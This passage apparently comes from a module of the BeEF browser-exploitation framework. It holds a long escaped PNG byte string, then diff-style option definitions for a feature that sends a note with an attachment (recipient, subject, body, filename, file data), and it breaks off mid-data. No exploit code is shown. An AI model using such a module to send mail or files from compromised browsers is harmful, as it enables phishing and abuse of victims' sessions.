b\xed\x40\x03\xc8\x1c\x11\x24\x42\xa2\x1f\x33\x2a\xfd\x87\x8d\xbf\xe8\xc4\x28\xa5\xbd\x03\x4a\xd2\xe2\x71\x3e\x21\xbe\xe3\x34\x76\x1b\xa4\x87\x1e\xba\x8f\x73\x5f\x51\x55\x65\xd5\x81\xef\xd6\xfc\xa2\x65\x7b\x47\x10\x8f\xe5\x74\x6e\x9c\x37\xb6\x58\x2c\x16\xb5\x43\x71\x11\xc3\x35\x8a\x31\xe5\xd1\xbc\xde\xc3\xaf\x45\xdd\xfc\x1f\xb2\xe2\xcf\x34\x88\x6a\x5f\x6f\x00\x42\x3b\xd3\x6b\xe2\xef\x96\x5f\x22\x50\x29\xb5\xea\x93\xbe\x06\x08\x7d\xc9\xe5\x2d\xa5\x87\xef\xd0\x70\x38\x51\xf6\xae\xb1\xf3\x46\x71\xd4\x78\xc1\xa0\xab\x45\xf2\xa1\xed\x7c\xc2\x6d\x87\x45\x50\x57\x17\xe5\x19\x8d\xc6\x1f\x9e\x78\xea\x85\x2f\xcf\x25\x67\x6e\x83\xd6\xa1\x33\x70\x1c\x84\x30\xca\x2e\x5f\x74\x8e\x54\x88\x00\x71\x11\x17\x0f\x8d\xcb\xa3\xb9\x21\xd1\x9d\x7c\xce\x8d\x10\x7a\x70\x5d\x4e\x95\xc9\x20\x72\xaf\xcc\x40\xc6\x0f\x5b\xe9\x7b\x50\xa9\xc7\xaf\x7d\x0d\x90\x49\xad\xd4\x2b\xa6\x63\xfb\x0d\x89\x86\x8c\x19\xb2\x8d\x0d\x9d\x5f\x03\xca\xb7\xca\x64\x86\x79\x59\x46\xa6\x50\x85\x28\x51\x89\x52\xa9\x3c\x91\x93\x9f\xcf\x16\xb6\xd9\xbf\x93\x73\xc8\xad\x4e\x41\xda\x8b\x75\x43\xd9\x24\x7a\x9d\x02\x3a\x78\x8e\xba\x00\x52\xc6\x6c\x89\x74\xc9\xb9\x47\xcc\xd0\xd7\x00\xb9\xb5\x49\x8d\x33\x9a\x20\x77\xd3\xc2\x3d\x98\xdd\x83\x2e\x8c\x73\x32\xcc\x6b\x8b\xb2\x71\xe6\x98\x18\xf3\x90\x91\x10\xba\xea\x2b\xe6\x46\x31\x5e\x35\x66\xd4\x08\xdd\xce\xdd\x87\xe4\xfc\x72\xc8\x3a\xbc\xa1\x64\xe1\x8f\xee\xc2\x16\x68\x14\xa5\x7a\x45\x27\x00\x21\x51\xed\x7e\x99\x01\x22\x87\xf5\x32\x3c\x2e\xd9\xe0\xef\x4b\x80\xd0\xd4\x9d\xeb\x9b\x3e\xab\x41\x0f\xdf\x61\xc3\xa0\xf1\xf0\xed\xb4\x8b\xbb\x5c\xac\x08\x3c\x7b\x68\x0b\x4c\x25\xe5\xad\x8b\xa0\x06\x00\xd5\xd6\xd4\xa0\xae\xae\xbe\x77\x7d\x7e\x99\x91\xae\x75\xd1\xc2\xde\xbe\x73\x89\x59\x5f\xdf\xa0\xe6\xaa\x55\xc7\x6f\x4f\xbb\xff\x9a\xee\x7c\x52\x17\x0b\x90\xd6\x43\x4f\xb3\x65\xc9\xd6\xa9\xb7\xd2\x25\x54\x8a\xef\x65\x33\xd3\xb1\xfa\x02\x20\xa4\xeb\x52\xfa\xe9\x82\x26\x5d\x97\x92\x11\x99\x51\xe9\x1b\x3a\x9c\x7b\xa6\x1a\x3b\x31\x2e\x65\x2a\x07\x14\x9d\x89\x43\xce\xa9\xc4\x16\xc9\x88\xb2\x01\x03\x92\x8f\x3e\xfe\x0a\xdf\xfc\xb8\x06\xf6\x3d\xf4\x62\x59\xd6\xad\xa3\x46\x83\x9b\x16\xcc\xc3\x5f\x9f\x7e\xa4\xc3\x33\xca\xca\xca\x5b\x37\xee\xeb\x78\xf7\xbd\xd4\x7b\xd7\xd3\xb4\x76\x32\xa6\x9f\x80\xd0\x54\xfb\x52\x93\xc2\x2c\x51\xf4\x53\x36\x70\x3b\x79\x7c\xc7\x9a\x00\xa1\x48\x2e\xd5\x52\xcf\x15\x1f\x3b\xb1\x7b\x2e\x83\xc1\x20\x18\xda\x1e\xae\x70\x0d\x08\xe3\xee\xcc\xce\xec\x0e\x7d\x55\x29\x92\xb8\x61\xce\x36\x11\x6a\x57\xaa\x17\xed\x14\x02\x8b\xd2\xf6\xa7\xcd\x9e\x3f\x9f\x85\xe4\x93\xc9\xbd\xbf\xac\x8d\x8d\x38\x78\xe2\x34\x86\x86\x0d\xc6\x4d\x4b\x6e\xe8\xe0\x69\x9b\x6c\x97\x45\x91\x78\x6a\x76\x67\x0b\x91\x74\x5a\x5c\xd4\x19\xb4\x01\x97\x16\x13\xa1\x1b\x48\x63\xed\xaa\xad\x05\x10\x1a\xc6\x49\x39\x57\xfe\xbc\xbf\x2d\xdd\x48\x85\x82\xbb\x67\x9d\x3c\x7c\xa0\xd6\x38\xc2\x27\x38\x1c\x0e\x6e\x3e\x4c\xbd\xea\x38\x73\x97\xcf\x42\x67\xe0\x89\x9e\x3a\x0f\x86\x09\x0d\x68\xa8\x2a\x43\x4d\x65\x19\x6a\x19\x97\x97\x97\xc2\x58\x5e\x25\xf4\x86\x22\xbb\xc4\x4e\x65\x93\xe9\xea\x0a\x85\xe8\x49\xb5\xef\xe5\x46\x6a\x90\xf3\x22\xb0\xcc\xac\xdc\x0e\x9f\x56\xab\xd5\x5d\xa9\x6f\x3a\x71\x37\x37\xf5\x72\x71\x58\x92\x04\x6b\x7a\xb3\xd3\xda\xc8\x2d\x20\xf5\x8c\x3c\x71\xc5\xb6\xa4\x62\x51\x9c\xe3\x1b\x2e\x31\xea\x0d\xd0\xf8\x79\x23\x28\x2c\x12\x5a\xef\x00\x06\x0e\x3f\xd8\x39\xb9\x42\xa1\x76\x66\x9b\xaa\x8a\xcf\x3d\x37\x77\xa1\x83\xab\x34\xce\xf0\x1a\x3e\xb9\x85\xbc\x35\xa3\x51\x5f\x8f\x86\x9a\x4a\x54\x5f\xc8\x44\x61\x46\x12\x72\x33\xd3\x61\xa4\x26\x0d\x04\x12\x1b\x93\x2a\x4a\x4a\x33\xa1\x42\x2d\xc6\xbd\x09\xa4\xc3\xce\x84\x49\xd1\x23\x31\x77\xce\x8c\x0e\xcf\xa1\x39\x2d\x5d\x24\x6b\x52\x8e\x0a\x65\x4f\x57\x77\xe3\xbe\x36\x88\x46\x7d\x67\x86\x7c\x4f\x77\x6d\x5b\x12\x6d\x4a\x5b\x7a\x33\x5a\x07\x0f\x73\x70\x30\x75\x48\xe3\xef\x83\x6b\x6e\xbe\x1f\x1a\xef\x40\x61\x62\x14\x93\x0a\x34\x77\x90\xa4\x43\x77\x9a\xc3\x71\x29\xd2\x32\x37\x4b\x26\xd4\x91\xab\x5d\x3d\xa1\x71\xf7\x81\x4f\xe4\x64\x84\x95\xe6\x21\x37\xe1\x00\x52\xe2\x0f\xb3\xbd\xae\xd6\xa6\x82\x88\x7f\xfa\xe3\x5d\x98\x7a\xcd\x44\x26\x49\x7a\x0e\x5c\x8a\xa6\x6b\x34\x6a\x8c\x1d\x33\x02\xbe\x7e\x3e\x1d\x9e\xe3\xe1\xee\x2e\x74\x3c\xe9\xd8\x8b\x45\x62\xcb\xd0\x4d\x09\x30\x41\xf4\x78\xe9\xdb\xdc\x4b\x7a\xe7\x6d\xe8\x59\x34\x9d\x9a\x28\xbc\x29\xee\xde\xd6\x92\x24\xf6\xa2\x1d\xf2\xa1\x28\xd5\x7a\xec\x7d\xb2\x15\x80\x50\x99\xed\x44\xfe\x88\x19\x8f\x61\xd1\xe3\x39\x38\x8c\xba\x1a\xeb\x7c\x3b\xbe\xad\x9a\x5b\xa9\x65\x6a\x37\x5f\x84\x5f\x7f\x3b\x7c\xc2\x47\x21\x61\xd7\x1a\x54\x9c\xcf\xb6\x99\x40\xe2\x88\x11\xc3\x39\xf7\x15\x4d\x9a\x30\x46\xa8\x8c\x24\x43\xbd\xbd\xaa\x15\x01\x21\xee\xb4\xf9\x22\x6f\x43\x40\xa2\x19\xf5\xd7\x77\x22\x3d\xae\xed\x21\x40\xc8\x21\xf3\xc7\x3e\xf8\xb9\x14\xf4\xfc\xb8\x17\x00\xb1\x29\x71\x64\xc7\x99\xea\xbd\x69\x0e\x88\xa3\x96\x4b\x0d\x0b\x8c\x65\xa4\x93\xcb\x15\xec\x5e\xca\x79\x4b\x1b\x33\xef\x31\xd2\x5a\xc9\xa2\x97\x76\x94\x83\x48\xe7\x92\xda\x65\x6e\x34\x30\x61\xd4\x2c\xc1\xb9\x8b\xd8\xa8\x87\x36\x70\x18\x26\x2d\x7d\x08\xf1\x9b\xbe\x12\x5a\xff\x38\x5d\xf9\xad\x37\x27\x4e\x1c\x8d\xc8\xe0\x41\x38\x73\xea\x2c\xe0\xac\x6e\x1b\x4d\xa7\x5d\x97\xb2\x72\x57\x40\xe8\x3c\x53\xd5\x62\x37\x35\x8b\xf7\x9a\x82\x8c\xd4\xbe\x69\x66\x27\x1f\xa1\x47\xcf\x73\xb1\xfa\x8a\xf4\xb0\x01\xf7\xe5\xa5\x02\x44\xf8\x01\xb4\xc2\x8d\x46\x94\x15\x64\xc2\x6f\xf4\x2c\x28\xed\x35\xe2\xce\xdf\x00\x43\x75\x05\xf4\x35\xe5\x8c\x2b\x99\xf6\x54\xc5\xb8\x1a\x7a\x5d\x2d\x5f\xf4\xa4\x56\xd0\x63\x3b\x07\x0d\xf7\x62\x99\x19\x20\x28\x16\xa2\x62\x7f\x13\x6b\xbd\x06\xc1\xc9\x37\x04\x4a\xf6\x98\xa4\x88\xd9\x32\xe8\x93\xbd\x8e\xd2\xe4\x55\x5a\x77\x8c\x5b\xf4\x07\x1c\x33\xfd\xb7\x45\xa5\xe1\x95\x4b\x4e\xce\xce\xb8\xfd\x96\xc5\x78\x21\xf5\xbd\xa6\x39\x27\x6d\x68\x90\x28\x1d\xf4\x68\x9f\xae\x41\x27\x5b\x3a\x94\x74\x46\x27\x21\xd4\x88\x48\x64\x25\x80\x90\x2b\x2c\x0b\x94\xb0\x66\x6f\x87\x73\x49\x09\xb0\xd7\xac\x81\x86\x2d\xdc\xca\xa2\x5c\x54\x96\x5c\x40\x4d\x55\x25\xea\x74\x3a\xa0\x56\xc7\x83\x85\xed\x6e\x19\xa9\x0a\x1d\x35\xc6\xa2\x43\x6c\x97\xf4\xf4\x0f\x40\xe0\xb0\x31\xf0\x8d\x9a\xcc\x8c\x78\x2d\x4c\x86\xfa\x26\x89\x62\x62\x46\xbf\x9d\xb3\x1b\x46\xcd\xbb\x03\xfb\xab\x56\x42\x4f\xc1\x45\x1e\x3f\xb9\x72\x23\xef\xb3\xaf\x9b\xbe\xe5\xfd\x2f\xfe\x57\x5e\x7a\xa1\xf4\xae\x2e\xda\xa4\xda\xa1\xe5\x2c\xfa\xee\x51\x63\x2f\x75\x7e\x09\x20\x5d\x10\x19\x1b\x5f\x71\x83\x8f\x0c\xd3\xfa\x06\x9c\xd9\xb3\x5d\x58\xf4\x16\x3d\x59\x6e\xe9\xcf\x2b\xef\xf9\x0e\xcf\xde\x83\x24\x43\x49\xfa\x39\x68\x13\xe3\x30\x74\xdc\x0c\xf8\x0c\x9b\xc0\xd3\x51\x1a\x45\xa3\xdf\xc8\x40\xe2\xe8\x1d\x84\xd1\x33\x16\xe0\xc8\xaf\x3f\x88\x2e\xe6\x3e\xf0\x6e\x5d\xfe\xf6\x9f\xa4\xbb\x6e\x56\xaa\x54\xf7\x2b\xe5\xf2\x72\x71\x73\x7a\xa0\x17\x40\xe8\x88\xa8\xa3\xfc\xb3\x8c\x7f\xe8\x6b\xa3\xb7\x07\xa4\xea\xe0\xb3\x2f\xe6\x04\x90\xd9\x9a\x91\x4e\x44\x23\x8a\xa9\xd4\xf3\x6f\x6c\x61\x3a\x40\x2e\xee\xe0\xf6\x56\xe8\xb4\xa1\x10\x41\xc5\x54\xaa\xaa\x9c\x3c\x1c\xcb\xfe\x01\x5e\xe1\x47\x11\x7d\xfd\x2d\x70\xf6\x1b\xc2\xeb\x49\x48\x56\x98\xf4\x3a\xee\xe1\xf2\x4f\x89\x47\x7e\xe2\x29\xeb\xab\x5a\x22\x38\xaa\xaa\xab\x51\x49\x8d\xe7\x8a\xfa\x38\x55\x89\xfd\x28\x1f\x1f\xaf\x5a\x27\x67\x47\xb2\x23\x8a\x20\xb8\x70\xd7\x33\xde\xc0\x6c\xbc\x7a\x51\x3e\xd2\x88\x2c\x6a\x90\xb1\x8c\x31\xf9\xc6\xc9\xf5\xe5\x2c\xaa\x50\xe6\x8b\x2c\x22\x4a\x07\x27\x90\x51\xdc\x24\x06\x42\x02\x63\x7a\x27\xe7\x97\x8b\x00\xaa\xe9\x47\x70\x68\x44\x55\xaf\xed\xef\xa0\xeb\x91\x89\x8e\x3b\x2b\xf2\x1a\x72\xf4\x3e\x13\xb8\x93\x8b\xe5\x1a\x6a\xad\xf7\x9a\x27\xee\x40\x6e\x7d\xb7\x87\x9a\xb9\xaa\xa6\xf4\xf3\xc6\xe4\xf9\xb7\xc2\x7d\xc8\x28\x2e\x41\x38\x96\x98\xdd\x53\x9a\x76\x1c\x87\xd6\x7c\x8d\x26\xbb\xc8\xca\x9f\xed\xed\xe9\x0a\x8d\x83\x83\xe0\x8e\xee\x43\x6a\xd0\x1b\xb2\x1e\xbf\xff\xbe\x7b\xff\xfe\xf7\xc7\xce\x8b\x0b\xb4\x4e\x5c\x14\x38\x7a\x38\x1e\x0b\xef\xfc\x13\x8a\xf2\x8b\x5b\x76\xa2\xa7\x1d\x81\xca\x6e\xdd\xbb\x01\x10\xcb\x42\xa3\x84\x45\x1d\x2e\x9e\xf7\xa4\x16\x81\xd7\x9f\xf9\x51\x74\xf3\x1a\xd0\xbe\x5e\xfe\x62\x9d\x15\xcd\xe2\xf5\xb2\xda\x77\xb5\x56\x50\xc5\x59\xf4\x8e\xf4\x6d\x7b\x4a\x5a\xf4\xce\x1a\x18\x8b\x4a\x71\xe0\xd7\x6f\x31\xed\x66\x05\xdc\x43\x47\xf0\x29\x55\xa4\x72\xb9\x06\x0f\x87\xab\xaf\x2f\x2a\xb2\x73\xad\x3f\xc6\x80\x7d\x76\xd1\x85\xb2\x26\x2f\x5d\x1f\x52\x35\xea\x75\x8f\xc4\x1e\x39\xb6\xaf\x07\xaf\xa9\x17\xb9\xa8\x0f\xbe\x8f\x4e\x64\x5b\xa0\x06\x91\x07\x8c\x0d\xc2\x9d\x2b\x8c\xbf\x14\x45\x7d\xfb\x1d\xbf\xb7\xbb\xb9\xb9\x0b\x6d\x92\x6a\x44\xaa\x6a\x71\x64\xcb\x0f\x98\xb6\x4c\xcb\x6c\x90\x40\x0e\x10\x6a\x0f\xe4\x15\x10\x8c\x8a\xf3\x59\xb0\x62\x03\xfa\x16\xa6\x6f\x9f\x67\x55\x54\x31\x75\xee\x41\x34\x34\x6c\x2e\x2c\x2a\x86\x44\x97\x9f\xac\x61\xcd\xfe\xa3\x1d\x38\xa8\xef\x55\x95\x8e\x03\xc4\x8e\x16\x73\x4f\x9d\x4a\x34\x56\x8d\x1a\x4b\x8b\x03\x3f\x3b\x16\xfc\x76\xd0\x17\x14\x21\x71\xf7\x6a\x6e\x8b\x70\x37\x31\x43\x94\xb3\x87\xcf\x40\xbd\x17\xa4\x5b\x2f\xb7\x18\xca\x72\x85\x34\x77\xf0\x4a\x00\xc8\x4c\x08\xa9\xce\xcd\x54\xa7\xe7\x46\xed\x35\xd3\xc7\xe3\xbd\x57\x9f\x43\x64\x50\x0f\x67\x8f\x9b\x05\xef\xd5\xad\xb3\x67\x62\xea\xb4\x71\x7c\xbe\x60\xa7\x20\x71\x52\xa3\x24\x39\x15\xe7\x0f\x6f\xe7\xf3\x42\xb8\x48\x74\x70\x14\x5c\xbd\xa6\x01\xe3\xea\x25\xf7\xea\x8f\x10\xe6\x12\xee\x90\x96\xe4\x95\x03\x10\x05\x84\x59\x7a\xc2\xca\xa4\xa8\x6e\x65\x1d\xc2\x22\x82\xf1\xf9\xdb\x2f\xe3\x60\xcc\x46\x3e\x72\xe0\x64\x72\x9a\x90\xc0\xd7\x13\xf3\xac\xa6\x01\x29\x19\xe7\xb1\xea\xab\x15\xb8\xf7\x77\x4b\x85\x59\x87\xfa\x0e\xf2\xe1\xa8\xda\xd0\x4e\x85\xe4\x13\x71\xa8\x2b\xca\x62\x7f\xca\x85\xda\x93\x81\x33\xb3\x2f\x91\xf1\x5d\x8c\xef\x45\xef\x9a\x14\x48\x64\xc3\x00\xb9\x06\x96\x94\x05\x5a\x8f\x4c\x1d\x9a\xcc\x76\xfc\xad\x6b\xbf\xc5\x9f\xee\xbf\x1b\xb9\x39\x79\xf8\xe0\xb3\x2f\xf9\x62\xef\xb1\x67\xda\xc9\x1e\x09\x27\x53\xb0\x61\xc3\x76\x7c\xf3\xd5\x47\x78\xfa\xd1\x3f\x09\x1f\x62\x34\xb5\x17\x37\xd4\xad\xbd\xac\x12\x59\x27\xf7\xf3\xb4\x16\x7d\x5d\x8d\x50\x47\x62\xbb\x3d\xb4\xe8\x47\x50\xc4\x9a\x62\x18\xd4\xec\x9b\x5c\xb5\x06\x69\x29\x5e\x79\x00\x21\x95\x40\xcd\x63\x04\xd5\x3a\x44\x8e\x18\x8a\x1f\xbe\xf9\x18\x61\xe1\xc2\xc8\xb3\xef\x56\xad\x45\x5a\x0a\x53\xab\x9d\x7b\x11\x93\xa0\xf8\x87\xc1\x88\xbd\xfb\x0f\xf1\x3f\xdf\x7c\xe3\x45\xdc\xbd\x6c\x91\xa0\xaa\x75\x24\x1c\x94\x0a\xe4\x67\xa6\x41\x5f\x5d\x86\xca\xd2\x0b\xb6\x7a\xad\xc9\x55\xbb\x41\x94\x18\x34\x6e\xf7\x33\x08\xa9\xe9\x12\xd9\x30\xf5\xd6\x8b\xa5\x10\x6f\x32\x57\x7f\x14\x1e\xce\x78\xe9\xd9\xa7\x10\x12\xda\xdc\x5d\x74\xf3\xf6\x5d\xc2\x8e\xdf\x75\xff\xa6\x4e\xec\x10\x33\x5f\xf4\x59\x79\xf9\x30\x32\x7b\x44\xc9\x1e\xff\x87\xd9\x33\xf1\xa7\x92\x70\x26\xe1\x2c\x78\xdb\x9b\x56\xbf\x42\x89\xba\xea\x6a\xd4\xe4\xa5\xa3\xb4\x20\x47\x18\xcb\x66\x1b\x44\xc1\xb5\x04\xc6\xdb\x19\xaf\x63\x9c\x24\x2d\xb9\xab\x43\x82\x50\x9f\xa5\xe1\x16\xa3\x7c\xd6\x38\x61\x54\x98\x85\xf2\x72\xf3\x91\x55\x70\x41\x18\x71\x76\x09\x64\x16\xd3\xdd\x89\x02\x06\xf9\xe3\xb6\x25\x0b\x05\x57\xab\xb9\xbd\xdd\x42\xf6\x47\xc1\xd9\x93\xa8\x2a\x29\xbd\x9c\x00\x31\x89\xb6\x04\x45\xa6\xa9\xe3\x39\xa5\x94\x53\xef\xdc\x97\x25\x70\x5c\x5d\x12\x84\xd2\xa6\x35\xdc\x53\xc4\x6c\x80\x05\xf3\x5b\x8f\x59\xbe\x50\x58\x8c\x3a\x4a\x4c\xec\x8d\xf4\xe0\x0b\x5e\xc6\xa5\x8f\xaf\x97\x27\x13\x0e\xcd\x5f\xf1\xae\x3b\x97\xe1\xfd\x2f\xbf\x45\x59\x49\x45\x6b\xf0\xd1\xfc\x41\x93\x09\x19\x67\xcf\x08\xb9\x58\xfd\x67\x7f\xd4\x89\x80\xa0\x26\xd0\xa4\x0f\x52\xcb\xfe\x54\x08\x25\x9f\x66\x69\x79\x5d\xbd\x00\xa1\x88\xb9\x3d\x1f\xa3\xe6\xee\x84\xe1\x11\x61\xad\x9e\xf4\x70\x77\x85\x3d\xed\xe2\x96\xb9\x80\xbd\x51\xb1\xd8\xfa\x8a\x08\x6f\xfd\xbe\x41\xc1\x83\x10\xe4\xe3\x85\xb2\xfc\x92\xd6\x53\x69\xf9\xc0\x5e\x23\xcc\x16\x50\xf6\x2d\x51\x24\x77\x2f\x04\x97\x2c\xd5\x5d\xd0\x18\xba\x32\x69\x29\x49\x00\x69\xab\x4a\x50\xc7\x65\xb8\xa8\x1d\xe0\xee\xe1\xde\xea\x49\xb2\x45\x82\x7d\x7d\x90\x9f\x9e\x27\x54\xc0\xf5\x78\x5f\xd6\xc3\xc9\xdf\x03\x37\x2f\x59\xd0\xda\xf0\x51\x28\x5a\x49\x94\xb6\x6a\x56\x1f\x83\x83\x3a\x16\xae\x66\xfc\x3f\x51\x62\x98\xa4\xe5\x23\xd9\x20\x9d\x51\xa9\xb8\x93\xf2\x1a\xc1\x8e\x68\xe1\x0d\x73\x85\x07\x1d\x97\x87\x76\x4e\x8d\x66\x2e\x0d\xee\x58\x30\x1f\xd3\xa6\x4d\x6c\xf5\x94\xc1\xa0\x67\x6c\x6c\x21\x65\xfa\x85\x28\xa9\x8f\x6a\xae\x67\x42\x98\x13\x9f\x28\x81\x43\x02\xc8\xc5\x88\xfa\xd2\x94\x93\xae\x5f\xa5\xab\x47\x79\x79\xfb\x79\x25\x0f\x3e\x70\x2f\x66\xcd\xbe\x06\xa8\xd1\x09\xd5\x6f\xdd\xb1\x3b\xea\x0d\xec\xfc\x7a\x2c\x5a\x3c\x07\xef\xbd\xf3\x72\xbb\x53\xb2\xb2\x72\x90\x55\x58\x28\xa8\x57\x7d\x4f\xb4\x01\x7c\x0b\x21\x56\xf1\x37\x48\x81\x3c\x09\x20\x3d\x20\xaa\x27\x48\x20\x57\xac\xae\xac\x1a\xa9\xa9\xed\x4b\x09\xdc\xdd\xdd\xf0\xcd\x7f\xdf\xc7\xe2\x25\xf3\x05\x5b\xa4\xb2\x4e\xc8\xad\x6a\x30\x0a\x63\x10\xc8\x05\x4c\x11\x72\x02\x45\x55\x3d\xdb\xa7\xeb\xe0\xe4\xa1\xc5\x93\x4f\xdc\x8f\xef\xbe\x59\x01\x4d\x07\x03\x2d\x7f\xfa\x79\x03\x2a\x2e\x94\xf7\xf5\x9c\x42\x0a\xd9\x53\x67\x0f\xea\xdc\x46\x9d\xd0\x25\xef\x93\x64\x83\xf4\x8a\x76\x31\x09\xb2\x88\x16\xfb\x9a\x5f\x37\xe1\x51\x1e\xed\x6e\x4d\x81\x41\x83\xb0\xf6\xe7\x2f\xb0\x7a\xf5\x06\xac\xfa\x71\x2d\x92\xd2\xcf\x21\xa7\xa4\x1c\x8d\xa4\x26\x91\x8a\xa4\x50\x71\x1b\x66\xc8\x20\x3f\x4c\x1a\x3b\x1a\xbf\xbf\xf7\x76\x4c\x98\x34\xb6\xc3\x0f\xcb\x3c\x9f\x8d\x1f\xd6\xae\x17\xa4\x51\xdf\x39\xa9\xc8\x0b\x45\xa2\x6b\x03\x6c\xab\xd7\x93\x44\x03\x10\x20\xbb\x41\x73\xed\x9c\xec\x7d\xf7\xc5\x9e\xc0\x3b\xef\xac\xc4\x93\x4f\xb6\x9f\xa3\x42\x46\xf5\x1d\x77\xdc\xc2\xf9\xdc\xb9\x4c\xa4\xa7\x9f\x47\x45\x45\x25\x1f\x99\xec\xee\xe6\x0a\x0f\x4f\x77\x44\x46\x45\xc0\xd5\xa5\xeb\x31\x7b\x4f\xfd\xed\x45\x24\x27\xa6\xf7\x2e\x32\xdf\x3d\x9b\x8a\xec\x0c\x9a\x6c\x54\x25\x2d\x0b\x89\xac\x01\x10\x52\x3d\x7e\x61\x52\xe4\x21\x32\xc4\x5f\x7e\xff\x63\x04\x31\x89\xd1\x32\x60\xd8\x96\x86\x0c\x09\xe1\xdc\x13\x2a\x2c\x2c\xc2\x83\x8f\xfc\x0d\xeb\x37\xec\xe4\x39\x5a\x7d\x20\x3d\x48\x5a\xfc\x9d\x71\xb2\xb4\x1c\x24\xb2\x96\x0d\x62\x21\x9a\x83\x9e\x47\xae\x5c\xb2\x0d\xee\xfb\xcb\x33\x78\xed\xb5\xf7\xd0\x50\x6f\x9d\x6e\xf8\xdf\x7f\xbf\x0e\xb3\x17\xdc\x86\xf5\xeb\xb6\x0b\x19\xc1\xd6\x0d\x00\x92\x67\x81\x44\xde\x52\x09\x1c\x12\xf5\x85\x04\x21\x4a\x63\xfc\x3c\xa8\x71\x83\xa3\xbd\xa2\x96\x19\xec\xcf\xbd\xf2\x0e\xd6\x6f\xd9\x8e\x3f\xdf\x77\x17\xe6\xcf\x9b\x85\x41\x81\x01\x3d\x7a\xc3\x73\xe9\x99\xd8\xbd\x67\x1f\x56\xfd\xb4\x0e\xfb\x8e\x27\x0a\xf5\x20\x2e\x56\x6f\x0a\x77\x8c\xf1\x83\x8c\x8f\x4b\x4b\x40\xa2\xbe\x04\x08\x11\xb5\xfd\xf1\x65\x46\xf7\x6b\xbc\x0e\xdc\x64\xc6\xd1\xd8\x93\x38\x9a\x98\x82\xb0\x60\x7f\x8c\x1f\x19\x8d\x11\xd1\x91\x18\x3d\x2a\x0a\x61\x61\x21\x70\x73\x75\xe5\x1e\x2a\xbd\x5e\xcf\x39\x37\xb7\x00\xc9\xc9\x67\x91\x74\x86\x71\x4a\x2a\x4e\x26\xa7\x20\x27\xfb\x82\xe0\xdd\xa2\x79\xe3\x5a\xab\xdb\x1c\x5f\x33\x7e\x12\xb6\xd1\xae\x5f\xa2\xab\x00\x20\x44\xd4\xcd\x8f\xf2\x92\x5e\x63\x6a\x90\x06\x2e\x1a\x1e\x20\x4c\x4f\x39\x8f\xf4\xa4\x0c\xfc\x68\xb7\x05\x0a\xad\x9a\xad\x77\x3b\xa8\x14\x0a\xb8\x69\x9d\xa0\x6b\xd0\xa3\x96\xa9\x62\x06\xa3\x09\xb5\x34\x0f\xa4\x5a\x27\x04\x09\xa9\x87\x16\xa9\x53\x2e\x2a\x6b\x07\x03\xa9\xe6\xe2\x25\x08\x23\x8b\x25\x92\xa8\x5f\x01\x42\xf4\x3e\x04\x37\xe9\xab\x6c\x61\x4f\xe3\x69\x1f\x4e\xe2\xee\xcf\xd6\x79\x63\xbd\x1e\x55\x75\x42\x43\x8a\xd2\xc2\x32\xb1\xa9\x9c\x68\x53\x58\xfa\x5f\xb5\x34\x31\xac\x0b\x0e\x02\xef\x63\x10\x66\x81\x4b\x24\xd1\x65\x01\x08\x11\xb5\xaa\xa1\x1c\x13\x0a\xb2\xdd\x0d\xa1\xc5\x7e\x50\x53\x9e\x94\x25\xbe\xa7\xea\xd7\x86\x04\xa4\x4a\xdd\x07\xc1\x5b\x25\x91\x44\x97\x15\x20\x44\xd4\x43\x89\x8a\x83\x7e\xe1\xe0\x00\x46\x30\x9e\xc2\x78\xa4\x08\x18\xbf\x7e\xfc\x7d\xe4\xa9\xa2\x7a\xef\x4d\xd2\xad\x96\xc8\x56\x00\xd2\xa4\x24\x41\x68\x6c\x9d\x25\x2e\x50\x92\x23\x34\xf9\xf6\x76\xc6\x7f\x61\x3c\xb8\x1f\x24\x87\x04\x0e\x89\x2e\x89\xfa\x73\x86\x19\x01\x86\x3a\xff\x7d\x00\xa1\x9e\xfd\x97\x3e\x96\x1c\xf7\x48\xe0\x90\x68\x20\x01\xa4\x25\x65\x89\x92\x84\x7a\x6a\x59\xbb\xd8\x88\xba\x36\xdc\x89\x8b\x4f\x5a\x92\x48\x22\x9b\x05\x08\x11\x75\x93\x7b\x8f\xf1\x7c\x2b\xee\xf4\xd4\x4e\x87\xaa\xac\xb6\x4a\xb7\x56\xa2\x81\x0e\x10\x0b\x1d\x65\xbc\x04\x42\x83\x03\x72\xc3\x9e\x43\xe7\x13\x58\x3b\x23\x1a\x1b\x46\xc9\x86\x34\x71\x37\x5e\xba\xad\x12\x0d\x04\x23\xbd\x27\x44\xa9\xe5\x7b\x44\x26\x2f\x57\x14\x84\x81\x94\x43\x19\x87\x33\xa6\x7c\x15\x67\x34\xb7\xb4\x26\x00\xe5\x41\x28\x7d\xa5\x21\xf6\xbb\x20\x15\x34\x49\xd4\x07\xf4\xff\x05\x18\x00\x7c\x62\x9e\xd7\xaf\x91\x9f\x33\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82'} + def self.options + [ + { 'type' => 'label', 'html' => 'Send a note to someone with an attachment:' }, + { 'type' => 'textfield', 'name' => 'to', 'ui_label' => 'TO', 'value' => '' }, + { 'type' => 'textfield', 'name' => 'subject', 'ui_label' => 'Subject', 'value' => '' }, + { 'name' => 'body', 'ui_label' => 'Body', 'type' => 'textarea', 'value' => '' }, + { 'type' => 'textfield', 'name' => 'filename', 'ui_label' => 'Filename', 'value' => 'BeEF_logo.png' }, + { 'type' => 'textarea', 'name' => 'filedata', 'ui_label' => 'Filedata', + 'value' => '\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\x00\x00\xc8\x00\x00\x00\x95\x08\x06\x00\x00\x00\x1d\x48\xb5\xb7\x00\x00\x00\x19\x74\x45\x58\x74\x53\x6f\x66\x74\x77\x61\x72\x65\x00\x41\x64\x6f\x62\x65\x20\x49\x6d\x61\x67\x65\x52\x65\x61\x64\x79\x71\xc9\x65\x3c\x00\x00\x33\x85\x49\x44\x41\x54\x78\xda\xec\x7d\x07\x58\x54\x67\xf6\xfe\x3b\x0d\x98\x01\x86\xde\xa5\x29\x88\x02\xf6\x1e\x4b\x34\xb1\x25\x96\x98\xa8\xe9\xc9\x66\x4b\x36\xed\x97\x6c\xda\x6e\xf6\x9f\x6c\x92\xcd\xa6\xec\xa6\x57\x63\xca\xa6\x6d\x62\x9a\x25\xc6\xde\x83\x15\x6c\x28\x28\x02\x82\x48\x47\x7a\x67\x60\x66\x98\xf9\x7f\xe7\xbb\x77\xe8\x20\xe0\x80\x83\xde\xf3\x78\x1e\x87\x3b\x77\xda\xbd\xdf\xfb\x9d\x7e\x8e\x0c\xae\xa1\x90\xa8\x15\x4d\x66\x7c\x13\x